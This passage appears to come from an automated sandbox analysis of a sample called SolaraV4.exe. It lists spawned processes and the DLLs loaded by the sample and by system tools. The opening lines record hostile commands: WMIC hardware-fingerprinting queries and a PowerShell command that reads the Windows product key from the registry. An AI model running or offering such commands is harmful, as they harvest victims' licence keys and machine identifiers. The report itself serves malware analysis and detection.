Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: python3.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: dciman32.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
